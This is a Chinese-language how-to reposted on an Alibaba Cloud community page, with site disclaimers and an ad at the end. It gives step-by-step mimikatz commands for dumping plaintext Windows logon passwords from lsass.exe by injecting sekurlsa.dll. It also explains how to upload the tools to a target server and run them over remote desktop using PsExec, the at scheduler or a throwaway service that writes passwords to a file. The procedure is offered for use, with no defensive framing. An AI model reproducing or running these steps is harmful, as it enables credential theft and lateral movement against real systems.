神器mimikatz–windows下抓取密碼

來源:互聯網
上載者:User
mimikatz是法國人寫的,windows下的輕量級調試器。可以直接抓取windows的口令。只要沒有重啟,登入過的賬戶口令都可以抓到。牛。

抓取 lsass.exe 中的使用者純文字密碼:

//提升許可權 privilege::debug 
//注入dll inject::process lsass.exe sekurlsa.dll
//抓取密碼 @getLogonPasswords


在遠程終端(3389、mstsc.exe)、虛擬桌面中抓取密碼的方法:

通常你在遠程終端中運行該程式會提示:儲存空間不足,無法處理此命令。

這是因為在終端模式下,不能插入遠線程,跨會話不能注入,你需要使用如下方法執行該程式:

首先提取幾個檔案,只抓取密碼的話,只需要這幾個檔案:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包後上傳至目標伺服器,然後解壓釋放,注意路徑中絕對不能有中文(可以有空格)!否則載入DLL的時候會報錯:找不到檔案。

然後使用以下任何一種方法即可抓取密碼:

 

//最簡單實用的方法,使用 PsExec.exe 啟動。 
//在本機啟動互動式命令提示視窗 psexec\\127.0.0.1 cmd.exe
//啟動 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe
//提升許可權 privilege::debug //注入dll,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)! inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密碼 @getLogonPasswords //退出,不要用 ctrl + c,會導致 mimikatz.exe CPU 佔用達到 100%,死迴圈。 exit
//*********************************************************
//使用 At 啟動 at *** //*********************************************************
//建立服務方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword //*********************************************************
//telnet 遠程命令管道 telnet ****
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.